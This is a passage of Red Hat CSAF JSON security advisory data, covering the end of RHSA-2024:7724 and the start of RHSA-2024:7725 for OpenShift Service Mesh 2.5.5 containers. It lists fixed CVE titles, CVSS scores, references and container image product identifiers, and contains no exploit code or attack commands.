"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7724"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "serve-static: Improper Sanitization in serve-static"
}
]
}
rhsa-2024_7725
Vulnerability from csaf_redhat
Published
2024-10-07 09:24
Modified
2024-11-06 07:10
Summary
Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.5.5
Notes
Topic
Red Hat OpenShift Service Mesh Containers for 2.5.5
This update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a
detailed severity rating, is available for each vulnerability from the CVE
link(s) in the References section.
Details
Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.
Security Fix(es):
* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule
(CVE-2024-43788)
* envoy: Envoy incorrectly accepts HTTP 200 response for entering upgrade mode (CVE-2024-23326)
* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)
* envoy: Brotli decompressor infinite loop (CVE-2024-32976)
* envoy: abnormal termination when using auto_sni with authority header longer
than 255 characters (CVE-2024-32475)
* envoy: HTTP/2 CPU exhaustion due to CONTINUATION frame flood (CVE-2024-30255)
* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat OpenShift Service Mesh Containers for 2.5.5\n\nThis update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a\ndetailed severity rating, is available for each vulnerability from the CVE\nlink(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat OpenShift Service Mesh is Red Hat\u0027s distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.\n\nSecurity Fix(es):\n* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule\n(CVE-2024-43788)\n* envoy: Envoy incorrectly accepts HTTP 200 response for entering upgrade mode (CVE-2024-23326)\n* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)\n* envoy: Brotli decompressor infinite loop (CVE-2024-32976)\n* envoy: abnormal termination when using auto_sni with authority header longer\nthan 255 characters (CVE-2024-32475)\n* envoy: HTTP/2 CPU exhaustion due to CONTINUATION frame flood (CVE-2024-30255)\n* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:7725",
"url": "https://access.redhat.com/errata/RHSA-2024:7725"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2259228",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2259228"
},
{
"category": "external",
"summary": "2272986",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2272986"
},
{
"category": "external",
"summary": "2276149",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2276149"
},
{
"category": "external",
"summary": "2283145",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2283145"
},
{
"category": "external",
"summary": "2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "2311171",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171"
},
{
"category": "external",
"summary": "2313683",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313683"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7725.json"
}
],
"title": "Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.5.5",
"tracking": {
"current_release_date": "2024-11-06T07:10:29+00:00",
"generator": {
"date": "2024-11-06T07:10:29+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.1.1"
}
},
"id": "RHSA-2024:7725",
"initial_release_date": "2024-10-07T09:24:53+00:00",
"revision_history": [
{
"date": "2024-10-07T09:24:53+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-10-07T09:24:53+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-11-06T07:10:29+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "RHOSSM 2.5 for RHEL 8",
"product": {
"name": "RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:service_mesh:2.5::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Service Mesh"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"product": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"product_id": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8\u0026tag=1.73.14-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.5.5-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.73.15-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"product_id": "openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8\u0026tag=2.5.5-6"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.5.5-3"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"product": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"product_id": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8\u0026tag=1.73.14-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.5.5-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.5.5-3"
}
}
},
{
"category": "product_version",
